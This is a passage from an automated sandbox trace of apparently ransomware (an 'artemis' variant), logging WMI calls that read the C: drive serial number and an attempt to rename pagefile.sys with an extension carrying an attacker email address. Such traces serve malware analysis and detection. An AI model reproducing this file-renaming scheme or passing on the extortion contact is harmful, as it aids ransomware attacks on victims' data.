pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ecec | out: ppvObject=0x641ecec*=0x6733ff0) returned 0x0 [0173.623] WbemDefPath:IUnknown:Release (This=0x6737400) returned 0x0 [0173.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e90c | out: ppvObject=0x641e90c*=0x6733ff0) returned 0x0 [0173.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641e8c8 | out: ppvObject=0x641e8c8*=0x0) returned 0x80004002 [0173.623] WbemDefPath:IUnknown:AddRef (This=0x6733ff0) returned 0x3 [0173.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e224 | out: ppvObject=0x641e224*=0x0) returned 0x80004002 [0173.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e1d4 | out: ppvObject=0x641e1d4*=0x0) returned 0x80004002 [0173.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e1e0 | out: ppvObject=0x641e1e0*=0x77dc98) returned 0x0 [0173.623] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e1e8 | out: pCid=0x641e1e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0173.623] WbemDefPath:IUnknown:Release (This=0x77dc98) returned 0x3 [0173.623] CoGetContextToken (in: pToken=0x641e240 | out: pToken=0x641e240) returned 0x0 [0173.624] CoGetContextToken (in: pToken=0x641e648 | out: pToken=0x641e648) returned 0x0 [0173.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e6d8 | out: ppvObject=0x641e6d8*=0x0) returned 0x80004002 [0173.624] WbemDefPath:IUnknown:Release (This=0x6733ff0) returned 0x2 [0173.624] WbemDefPath:IUnknown:Release (This=0x6733ff0) returned 0x1 [0173.624] CoGetContextToken (in: pToken=0x641efd0 | out: pToken=0x641efd0) returned 0x0 [0173.624] CoGetContextToken (in: pToken=0x641ef30 | out: pToken=0x641ef30) returned 0x0 [0173.624] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ff0, riid=0x641f000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x641effc | out: ppvObject=0x641effc*=0x6733ff0) returned 0x0 [0173.624] WbemDefPath:IUnknown:AddRef (This=0x6733ff0) returned 0x3 [0173.624] WbemDefPath:IUnknown:Release (This=0x6733ff0) returned 0x2 [0173.624] WbemDefPath:IWbemPath:SetText (This=0x6733ff0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0173.624] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733ff0, puCount=0x641f17c | out: puCount=0x641f17c*=0x2) returned 0x0 [0173.624] WbemDefPath:IWbemPath:GetText (in: This=0x6733ff0, lFlags=4, puBuffLength=0x641f178*=0x0, pszText=0x0 | out: puBuffLength=0x641f178*=0xf, pszText=0x0) returned 0x0 [0173.624] WbemDefPath:IWbemPath:GetText (in: This=0x6733ff0, lFlags=4, puBuffLength=0x641f178*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.624] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641f17c | out: ppv=0x641f17c*=0x72015c) returned 0x0 [0173.624] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x641f174 | out: pAptType=0x641f174*=1) returned 0x0 [0173.624] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x641f178 | out: ppvObject=0x641f178*=0x0) returned 0x80004002 [0173.624] IUnknown:Release (This=0x72015c) returned 0x1 [0173.625] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x641ed98 | out: ppv=0x641ed98*=0x673d258) returned 0x0 [0173.625] WbemLocator:IUnknown:QueryInterface (in: This=0x673d258, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641efb0 | out: ppvObject=0x641efb0*=0x0) returned 0x80004002 [0173.625] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d258, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641efc4 | out: ppvObject=0x641efc4*=0x6737410) returned 0x0 [0173.625] WbemLocator:IUnknown:Release (This=0x673d258) returned 0x0 [0173.625] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ebe4 | out: ppvObject=0x641ebe4*=0x6737410) returned 0x0 [0173.625] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eba0 | out: ppvObject=0x641eba0*=0x0) returned 0x80004002 [0173.626] WbemLocator:IUnknown:AddRef (This=0x6737410) returned 0x3 [0173.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e4fc | out: ppvObject=0x641e4fc*=0x0) returned 0x80004002 [0173.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e4ac | out: ppvObject=0x641e4ac*=0x0) returned 0x80004002 [0173.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e4b8 | out: ppvObject=0x641e4b8*=0x0) returned 0x80004002 [0173.626] CoGetContextToken (in: pToken=0x641e518 | out: pToken=0x641e518) returned 0x0 [0173.626] CoGetContextToken (in: pToken=0x641e920 | out: pToken=0x641e920) returned 0x0 [0173.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e9b0 | out: ppvObject=0x641e9b0*=0x0) returned 0x80004002 [0173.626] WbemLocator:IUnknown:Release (This=0x6737410) returned 0x2 [0173.626] WbemLocator:IUnknown:Release (This=0x6737410) returned 0x1 [0173.626] CoGetContextToken (in: pToken=0x641ef90 | out: pToken=0x641ef90) returned 0x0 [0173.626] CoGetContextToken (in: pToken=0x641eef0 | out: pToken=0x641eef0) returned 0x0 [0173.626] WbemLocator:IUnknown:QueryInterface (in: This=0x6737410, riid=0x641efc0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x641efbc | out: ppvObject=0x641efbc*=0x6737410) returned 0x0 [0173.626] WbemLocator:IUnknown:AddRef (This=0x6737410) returned 0x3 [0173.626] WbemLocator:IUnknown:Release (This=0x6737410) returned 0x2 [0173.626] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733ff0, puCount=0x641f158 | out: puCount=0x641f158*=0x2) returned 0x0 [0173.626] WbemDefPath:IWbemPath:GetText (in: This=0x6733ff0, lFlags=8, puBuffLength=0x641f154*=0x0, pszText=0x0 | out: puBuffLength=0x641f154*=0xf, pszText=0x0) returned 0x0 [0173.626] WbemDefPath:IWbemPath:GetText (in: This=0x6733ff0, lFlags=8, puBuffLength=0x641f154*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f154*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.626] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x641f030 | out: ppv=0x641f030*=0x6737420) returned 0x0 [0173.626] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737420, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x641f0c4 | out: ppNamespace=0x641f0c4*=0x6747ffc) returned 0x0 [0175.315] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef60 | out: ppvObject=0x641ef60*=0x782084) returned 0x0 [0175.315] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x782084, pProxy=0x6747ffc, pAuthnSvc=0x641efb0, pAuthzSvc=0x641efac, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8, pImpLevel=0x641ef98, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0 | out: pAuthnSvc=0x641efb0*=0xa, pAuthzSvc=0x641efac*=0x0, pServerPrincName=0x641efa4, pAuthnLevel=0x641efa8*=0x6, pImpLevel=0x641ef98*=0x2, pAuthInfo=0x641ef9c, pCapabilites=0x641efa0*=0x1) returned 0x0 [0175.315] WbemLocator:IUnknown:Release (This=0x782084) returned 0x1 [0175.315] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef54 | out: ppvObject=0x641ef54*=0x7820a4) returned 0x0 [0175.315] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ef50 | out: ppvObject=0x641ef50*=0x782084) returned 0x0 [0175.315] WbemLocator:IClientSecurity:SetBlanket (This=0x782084, pProxy=0x6747ffc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0175.315] WbemLocator:IUnknown:Release (This=0x782084) returned 0x2 [0175.315] WbemLocator:IUnknown:Release (This=0x7820a4) returned 0x1 [0175.315] CoTaskMemFree (pv=0x77e148) [0175.315] WbemLocator:IUnknown:Release (This=0x6737420) returned 0x0 [0175.315] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641eb50 | out: ppvObject=0x641eb50*=0x7820a4) returned 0x0 [0175.316] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641eb0c | out: ppvObject=0x641eb0c*=0x0) returned 0x80004002 [0175.318] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641e92c | out: ppvObject=0x641e92c*=0x0) returned 0x80004002 [0177.384] WbemLocator:IUnknown:AddRef (This=0x7820a4) returned 0x3 [0177.384] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641e46c | out: ppvObject=0x641e46c*=0x0) returned 0x80004002 [0177.500] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641e41c | out: ppvObject=0x641e41c*=0x0) returned 0x80004002 [0177.501] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e428 | out: ppvObject=0x641e428*=0x782004) returned 0x0 [0177.501] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x782004, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641e430 | out: pCid=0x641e430*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0177.501] WbemLocator:IUnknown:Release (This=0x782004) returned 0x3 [0177.501] CoGetContextToken (in: pToken=0x641e488 | out: pToken=0x641e488) returned 0x0 [0177.501] CoGetContextToken (in: pToken=0x641e890 | out: pToken=0x641e890) returned 0x0 [0177.501] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641e920 | out: ppvObject=0x641e920*=0x78208c) returned 0x0 [0177.501] WbemLocator:IRpcOptions:Query (in: This=0x78208c, pPrx=0x7820a4, dwProperty=2, pdwValue=0x641e948 | out: pdwValue=0x641e948) returned 0x80004002 [0177.501] WbemLocator:IUnknown:Release (This=0x78208c) returned 0x3 [0177.501] WbemLocator:IUnknown:Release (This=0x7820a4) returned 0x2 [0177.501] CoGetContextToken (in: pToken=0x641ee60 | out: pToken=0x641ee60) returned 0x0 [0177.502] CoGetContextToken (in: pToken=0x641edc0 | out: pToken=0x641edc0) returned 0x0 [0177.502] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x641ee90*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x641ee8c | out: ppvObject=0x641ee8c*=0x6747ffc) returned 0x0 [0177.502] WbemLocator:IUnknown:AddRef (This=0x6747ffc) returned 0x4 [0177.502] WbemLocator:IUnknown:Release (This=0x6747ffc) returned 0x3 [0177.502] WbemLocator:IUnknown:Release (This=0x6747ffc) returned 0x2 [0177.502] SysStringLen (param_1=0x0) returned 0x0 [0177.502] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733f80, puCount=0x641f228 | out: puCount=0x641f228*=0x0) returned 0x0 [0177.502] WbemDefPath:IWbemPath:GetText (in: This=0x6733f80, lFlags=2, puBuffLength=0x641f224*=0x0, pszText=0x0 | out: puBuffLength=0x641f224*=0x20, pszText=0x0) returned 0x0 [0177.502] WbemDefPath:IWbemPath:GetText (in: This=0x6733f80, lFlags=2, puBuffLength=0x641f224*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f224*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.502] CoGetContextToken (in: pToken=0x641ee98 | out: pToken=0x641ee98) returned 0x0 [0177.502] WbemLocator:IUnknown:AddRef (This=0x7820a4) returned 0x3 [0177.502] WbemLocator:IUnknown:QueryInterface (in: This=0x7820a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641ed2c | out: ppvObject=0x641ed2c*=0x7820a4) returned 0x0 [0177.502] WbemLocator:IUnknown:Release (This=0x7820a4) returned 0x3 [0177.502] WbemLocator:IUnknown:Release (This=0x7820a4) returned 0x2 [0177.502] WbemDefPath:IWbemPath:GetText (in: This=0x6733f80, lFlags=2, puBuffLength=0x641f22c*=0x0, pszText=0x0 | out: puBuffLength=0x641f22c*=0x20, pszText=0x0) returned 0x0 [0177.502] WbemDefPath:IWbemPath:GetText (in: This=0x6733f80, lFlags=2, puBuffLength=0x641f22c*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641f22c*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.502] IWbemServices:GetObject (in: This=0x6747ffc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x641f1e0*=0x0, ppCallResult=0x0 | out: ppObject=0x641f1e0*=0x673c128, ppCallResult=0x0) returned 0x0 [0179.102] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733ff0, puCount=0x641f1e0 | out: puCount=0x641f1e0*=0x2) returned 0x0 [0179.102] WbemDefPath:IWbemPath:GetText (in: This=0x6733ff0, lFlags=4, puBuffLength=0x641f1dc*=0x0, pszText=0x0 | out: puBuffLength=0x641f1dc*=0xf, pszText=0x0) returned 0x0 [0179.102] WbemDefPath:IWbemPath:GetText (in: This=0x6733ff0, lFlags=4, puBuffLength=0x641f1dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x641f1dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.103] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x391f188*=0, plFlavor=0x391f18c*=0 | out: pVal=0x641f1dc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x391f188*=8, plFlavor=0x391f18c*=0) returned 0x0 [0179.103] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.103] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.103] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641f1e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x391f188*=8, plFlavor=0x391f18c*=0 | out: pVal=0x641f1e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x391f188*=8, plFlavor=0x391f18c*=0) returned 0x0 [0179.103] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.103] SysStringByteLen (bstr="9C354B42") returned 0x10 [0179.103] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0179.103] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x641ede4, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3a [0179.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f244) returned 1 [0179.104] GetFileAttributesExW (in: lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), fInfoLevelId=0x0, lpFileInformation=0x641f2c0 | out: lpFileInformation=0x641f2c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f240) returned 1 [0179.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f1e0) returned 1 [0179.104] FindFirstFileW (in: lpFileName="C:\\pagefile.sys", lpFindFileData=0x641ef20 | out: lpFindFileData=0x641ef20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xf456e360, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 0x77af30 [0179.104] FindClose (in: hFindFile=0x77af30 | out: hFindFile=0x77af30) returned 1 [0179.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f1dc) returned 1 [0179.104] MoveFileW (lpExistingFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), lpNewFileName="C:\\pagefile.sys.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\pagefile.sys.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0179.107] CoUninitialize () [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] ResetEvent (hEvent=0xb8) returned 1 [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] ResetEvent (hEvent=0xb8) returned 1 [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] GetCurrentThreadId () returned 0xb18 [0179.108] SetEvent (hEvent=0xbc) returned 1 [0179.108] SetEvent (hEvent=0xb8) returned 1 [0179.108] CloseHandle (hObject=0x384) returned 1 [0179.110] SysReAllocStringLen (in: pbstr=0x641f938*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x641f938*="KERNEL32.DLL") returned 1 [0179.111] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.116] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.128] GetCurrentThreadId () returned 0xb18 [0179.128] ResetEvent (hEvent=0xb8) returned 1 [0179.128] GetCurrentThreadId () returned 0xb18 [0179.128] GetCurrentThreadId () returned 0xb18 [0179.128] GetCurrentThreadId () returned 0xb18 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] ResetEvent (hEvent=0xb8) returned 1 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] SetEvent (hEvent=0xbc) returned 1 [0179.129] SetEvent (hEvent=0xb8) returned 1 [0179.129] CloseHandle (hObject=0x28c) returned 1 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] ResetEvent (hEvent=0xb8) returned 1 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] ResetEvent (hEvent=0xb8) returned 1 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] GetCurrentThreadId () returned 0xb18 [0179.129] SetEvent (hEvent=0xbc) returned 1 [0179.129] SetEvent (hEvent=0xb8) returned 1 [0179.129] CloseHandle (hObject=0x264) returned 1 Thread: id = 128 os_tid = 0xa48 [0130.920] SysReAllocStringLen (in: pbstr=0x689f9fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x689f9fc*="KERNEL32.DLL") returned 1 [0130.920] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.920] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.924] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.925] SysReAllocStringLen (in: pbstr=0x689f9fc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x689f9fc*="KERNEL32.DLL") returned 1 [0130.925] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0130.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.928] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.929] SysReAllocStringLen (in: 